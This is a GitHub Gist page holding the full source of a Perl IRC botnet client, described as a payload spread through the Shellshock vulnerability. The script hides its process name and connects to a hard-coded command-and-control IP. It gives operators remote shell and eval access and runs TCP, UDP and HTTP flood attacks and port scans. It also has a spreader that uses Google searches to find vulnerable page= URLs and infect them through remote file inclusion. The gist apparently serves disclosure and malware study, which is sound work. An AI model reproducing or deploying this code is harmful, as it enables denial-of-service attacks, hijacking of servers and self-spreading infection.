Created
October 2, 2014 18:27
-
-
Save jacquerie/0569a4a192b06f25d764 to your computer and use it in GitHub Desktop.
This payload is currently being distributed using the Shellshock vulnerability (from http://89.33.193.10/ji)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
# ------------------------------------------------------------- # | |
# LinuxNet perlbot # | |
# ------------------------------------------------------------- # | |
#system("kill -9 `ps ax |grep /usr/sbin/apache2/log |grep -v grep|awk '{print $1;}'`"); | |
#system("kill -9 `ps ax |grep /usr/sbin/apache3/log |grep -v grep|awk '{print $1;}'`"); | |
#system("kill -9 `ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'`"); | |
#system("kill -9 `ps ax |grep /usr/sbin/httpd |grep -v grep|awk '{print $1;}'`"); | |
#system("kill -9 `ps ax |grep /usr/sbin/atd |grep -v grep|awk '{print $1;}'`"); | |
my $processo = '-'; | |
my @titi = ("index.php?page=","main.php?page="); | |
my $goni = $titi[rand scalar @titi]; | |
my $linas_max='7'; | |
my $sleep='7'; | |
my @adms=("x","JB" ); | |
my @hostauth=("localhost","outlaw"); | |
my @canais=("#gnu"); | |
my $nick='|GNU|'; | |
my $ircname ='GNU'; | |
chop (my $realname = `uname -sr`); | |
$servidor='64.235.56.228' unless $servidor; | |
my $porta='443'; | |
my $VERSAO = '0.5'; | |
$SIG{'INT'} = 'IGNORE'; | |
$SIG{'HUP'} = 'IGNORE'; | |
$SIG{'TERM'} = 'IGNORE'; | |
$SIG{'CHLD'} = 'IGNORE'; | |
$SIG{'PS'} = 'IGNORE'; | |
use IO::Socket; | |
use Socket; | |
use IO::Select; | |
chdir("/tmp"); | |
$servidor="$ARGV[0]" if $ARGV[0]; | |
$0="$processo"."\0"x16;; | |
my $pid=fork; | |
exit if $pid; | |
die "Problema com o fork: $!" unless defined($pid); | |
our %irc_servers; | |
our %DCC; | |
my $dcc_sel = new IO::Select->new(); | |
$sel_cliente = IO::Select->new(); | |
sub sendraw { | |
if ($#_ == '1') { | |
my $socket = $_[0]; | |
print $socket "$_[1]\n"; | |
} else { | |
print $IRC_cur_socket "$_[0]\n"; | |
} | |
} | |
sub conectar { | |
my $meunick = $_[0]; | |
my $servidor_con = $_[1]; | |
my $porta_con = $_[2]; | |
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); | |
if (defined($IRC_socket)) { | |
$IRC_cur_socket = $IRC_socket; | |
$IRC_socket->autoflush(1); | |
$sel_cliente->add($IRC_socket); | |
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; | |
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; | |
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; | |
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; | |
nick("$meunick"); | |
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); | |
sleep 1; | |
} | |
} | |
my $line_temp; | |
while( 1 ) { | |
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } | |
delete($irc_servers{''}) if (defined($irc_servers{''})); | |
my @ready = $sel_cliente->can_read(0); | |
next unless(@ready); | |
foreach $fh (@ready) { | |
$IRC_cur_socket = $fh; | |
$meunick = $irc_servers{$IRC_cur_socket}{'nick'}; | |
$nread = sysread($fh, $msg, 4096); | |
if ($nread == 0) { | |
$sel_cliente->remove($fh); | |
$fh->close; | |
delete($irc_servers{$fh}); | |
} | |
@lines = split (/\n/, $msg); | |
for(my $c=0; $c<= $#lines; $c++) { | |
$line = $lines[$c]; | |
$line=$line_temp.$line if ($line_temp); | |
$line_temp=''; | |
$line =~ s/\r$//; | |
unless ($c == $#lines) { | |
parse("$line"); | |
} else { | |
if ($#lines == 0) { | |
parse("$line"); | |
} elsif ($lines[$c] =~ /\r$/) { | |
parse("$line"); | |
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { | |
parse("$line"); | |
} else { | |
$line_temp = $line; | |
} | |
} | |
} | |
} | |
} | |
sub parse { | |
my $servarg = shift; | |
if ($servarg =~ /^PING \:(.*)/) { | |
sendraw("PONG :$1"); | |
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { | |
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; | |
if ($args =~ /^\001VERSION\001$/) { | |
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001"); | |
} | |
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) { | |
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { | |
if ($onde eq "$meunick"){ | |
shell("$pn", "$args"); | |
} | |
if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) { | |
my $natrix = $1; | |
my $arg = $2; | |
if ($arg =~ /^\!(.*)/) { | |
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); | |
} elsif ($arg =~ /^\@(.*)/) { | |
$ondep = $onde; | |
$ondep = $pn if $onde eq $meunick; | |
bfunc("$ondep","$1"); | |
} else { | |
shell("$onde", "$arg"); | |
} | |
} | |
} | |
} | |
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { | |
if (lc($1) eq lc($meunick)) { | |
$meunick=$4; | |
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; | |
} | |
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) { | |
nick("$meunick".int rand(999999)); | |
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { | |
$meunick = $2; | |
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; | |
$irc_servers{$IRC_cur_socket}{'nome'} = "$1"; | |
foreach my $canal (@canais) { | |
sendraw("JOIN $canal ddosit"); | |
} | |
} | |
} | |
sub bfunc { | |
my $printl = $_[0]; | |
my $funcarg = $_[1]; | |
if (my $pid = fork) { | |
waitpid($pid, 0); | |
} else { | |
if (fork) { | |
exit; | |
} else { | |
if ($funcarg =~ /^portscan (.*)/) { | |
my $hostip="$1"; | |
my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); | |
my (@aberta, %porta_banner); | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports."); | |
foreach my $porta (@portas) { | |
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4); | |
if ($scansock) { | |
push (@aberta, $porta); | |
$scansock->close; | |
} | |
} | |
if (@aberta) { | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta"); | |
} else { | |
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); | |
} | |
} | |
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds."); | |
my $itime = time; | |
my ($cur_time); | |
$cur_time = time - $itime; | |
while ($3>$cur_time){ | |
$cur_time = time - $itime; | |
&tcpflooder("$1","$2","$3"); | |
} | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2."."); | |
} | |
if ($funcarg =~ /^version/) { | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO); | |
} | |
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) { | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched mambo for ".$1." seconds."); | |
srand; | |
my $itime = time; | |
my ($cur_time); | |
my ($exploited); | |
$boturl=$2; | |
$cur_time = time - $itime;$exploited = 0; | |
while($1>$cur_time){ | |
$cur_time = time - $itime; | |
@urls=fetch(); | |
foreach $url (@urls) { | |
$cur_time = time - $itime; | |
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/; | |
$url =$path."/$goni$boturl" ; | |
$page = http_query($url); | |
$exploited = $exploited + 1; | |
} | |
} | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." seconds."); | |
} | |
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds."); | |
my $itime = time; | |
my ($cur_time); | |
$cur_time = time - $itime; | |
while ($2>$cur_time){ | |
$cur_time = time - $itime; | |
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); | |
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; | |
close($socket); | |
} | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1."."); | |
} | |
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds."); | |
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); | |
$dtime = 1 if $dtime == 0; | |
my %bytes; | |
$bytes{igmp} = $2 * $pacotes{igmp}; | |
$bytes{icmp} = $2 * $pacotes{icmp}; | |
$bytes{o} = $2 * $pacotes{o}; | |
$bytes{udp} = $2 * $pacotes{udp}; | |
$bytes{tcp} = $2 * $pacotes{tcp}; | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1."."); | |
} | |
exit; | |
} | |
} | |
} | |
sub ircase { | |
my ($kem, $printl, $case) = @_; | |
if ($case =~ /^join (.*)/) { | |
j("$1"); | |
} | |
if ($case =~ /^refresh (.*)/) { | |
my $goni = $titi[rand scalar @titi]; | |
} | |
if ($case =~ /^part (.*)/) { | |
p("$1"); | |
} | |
if ($case =~ /^rejoin\s+(.*)/) { | |
my $chan = $1; | |
if ($chan =~ /^(\d+) (.*)/) { | |
for (my $ca = 1; $ca <= $1; $ca++ ) { | |
p("$2"); | |
j("$2"); | |
} | |
} else { | |
p("$chan"); | |
j("$chan"); | |
} | |
} | |
if ($case =~ /^op/) { | |
op("$printl", "$kem") if $case eq "op"; | |
my $oarg = substr($case, 3); | |
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); | |
} | |
if ($case =~ /^deop/) { | |
deop("$printl", "$kem") if $case eq "deop"; | |
my $oarg = substr($case, 5); | |
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); | |
} | |
if ($case =~ /^msg\s+(\S+) (.*)/) { | |
msg("$1", "$2"); | |
} | |
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { | |
for (my $cf = 1; $cf <= $1; $cf++) { | |
msg("$2", "$3"); | |
} | |
} | |
if ($case =~ /^ctcp\s+(\S+) (.*)/) { | |
ctcp("$1", "$2"); | |
} | |
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { | |
for (my $cf = 1; $cf <= $1; $cf++) { | |
ctcp("$2", "$3"); | |
} | |
} | |
if ($case =~ /^nick (.*)/) { | |
nick("$1"); | |
} | |
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { | |
conectar("$2", "$1", 6667); | |
} | |
if ($case =~ /^raw (.*)/) { | |
sendraw("$1"); | |
} | |
if ($case =~ /^eval (.*)/) { | |
eval "$1"; | |
} | |
} | |
sub shell { | |
my $printl=$_[0]; | |
my $comando=$_[1]; | |
if ($comando =~ /cd (.*)/) { | |
chdir("$1") || msg("$printl", "No such file or directory"); | |
return; | |
} | |
elsif ($pid = fork) { | |
waitpid($pid, 0); | |
} else { | |
if (fork) { | |
exit; | |
} else { | |
my @resp=`$comando 2>&1 3>&1`; | |
my $c=0; | |
foreach my $linha (@resp) { | |
$c++; | |
chop $linha; | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); | |
if ($c == "$linas_max") { | |
$c=0; | |
sleep $sleep; | |
} | |
} | |
exit; | |
} | |
} | |
} | |
sub tcpflooder { | |
my $itime = time; | |
my ($cur_time); | |
my ($ia,$pa,$proto,$j,$l,$t); | |
$ia=inet_aton($_[0]); | |
$pa=sockaddr_in($_[1],$ia); | |
$ftime=$_[2]; | |
$proto=getprotobyname('tcp'); | |
$j=0;$l=0; | |
$cur_time = time - $itime; | |
while ($l<1000){ | |
$cur_time = time - $itime; | |
last if $cur_time >= $ftime; | |
$t="SOCK$l"; | |
socket($t,PF_INET,SOCK_STREAM,$proto); | |
connect($t,$pa)||$j--; | |
$j++;$l++; | |
} | |
$l=0; | |
while ($l<1000){ | |
$cur_time = time - $itime; | |
last if $cur_time >= $ftime; | |
$t="SOCK$l"; | |
shutdown($t,2); | |
$l++; | |
} | |
} | |
sub udpflooder { | |
my $iaddr = inet_aton($_[0]); | |
my $msg = 'A' x $_[1]; | |
my $ftime = $_[2]; | |
my $cp = 0; | |
my (%pacotes); | |
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; | |
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; | |
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; | |
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; | |
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; | |
return(undef) if $cp == 4; | |
my $itime = time; | |
my ($cur_time); | |
while ( 1 ) { | |
for (my $porta = 1; $porta <= 65000; $porta++) { | |
$cur_time = time - $itime; | |
last if $cur_time >= $ftime; | |
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; | |
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; | |
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; | |
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; | |
for (my $pc = 3; $pc <= 255;$pc++) { | |
next if $pc == 6; | |
$cur_time = time - $itime; | |
last if $cur_time >= $ftime; | |
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; | |
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; | |
} | |
} | |
last if $cur_time >= $ftime; | |
} | |
return($cur_time, %pacotes); | |
} | |
sub ctcp { | |
return unless $#_ == 1; | |
sendraw("PRIVMSG $_[0] :\001$_[1]\001"); | |
} | |
sub msg { | |
return unless $#_ == 1; | |
sendraw("PRIVMSG $_[0] :$_[1]"); | |
} | |
sub notice { | |
return unless $#_ == 1; | |
sendraw("NOTICE $_[0] :$_[1]"); | |
} | |
sub op { | |
return unless $#_ == 1; | |
sendraw("MODE $_[0] +o $_[1]"); | |
} | |
sub deop { | |
return unless $#_ == 1; | |
sendraw("MODE $_[0] -o $_[1]"); | |
} | |
sub j { &join(@_); } | |
sub join { | |
return unless $#_ == 0; | |
sendraw("JOIN $_[0]"); | |
} | |
sub p { part(@_); } | |
sub part { | |
sendraw("PART $_[0]"); | |
} | |
sub nick { | |
return unless $#_ == 0; | |
sendraw("NICK $_[0]"); | |
} | |
sub quit { | |
sendraw("QUIT :$_[0]"); | |
} | |
# Spreader | |
# this 'spreader' code isnot mine, i dont know who coded it. | |
# update: well, i just fix0red this shit a bit. | |
# | |
sub fetch(){ | |
my $rnd=(int(rand(9999))); | |
my $n= 80; | |
if ($rnd<5000) { $n<<=1;} | |
my $s= (int(rand(5)) * $n); | |
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", "eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec", | |
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop", | |
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi", | |
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk", | |
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir", | |
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke", | |
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm", | |
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc", | |
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz", | |
"vu","vn","ye","yu","cd","zm","zw",""); | |
my @str; | |
foreach $dom (@dominios) | |
{ | |
push (@str,"allinurl:%22".$dom."/".$goni."%22"); | |
} | |
my $query="www.google.com/search?q="; | |
$query.=$str[(rand(scalar(@str)))]; | |
$query.="&num=$n&start=$s"; | |
my @lst=(); | |
my $page = http_query($query); | |
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){ | |
if ($1 !~ m/google|cache|translate/){ | |
push (@lst,$1); | |
} | |
} | |
return (@lst); | |
} | |
sub http_query($){ | |
my ($url) = @_; | |
my $host=$url; | |
my $query=$url; | |
my $page=""; | |
$host =~ s/href=\"?http:\/\///; | |
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; | |
$query =~s/$host//; | |
if ($query eq "") {$query="/";}; | |
eval { | |
local $SIG{ALRM} = sub { die "1";}; | |
alarm 10; | |
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; | |
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; | |
my @r = <$sock>; | |
$page="@r"; | |
alarm 0; | |
close($sock); | |
}; | |
return $page; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment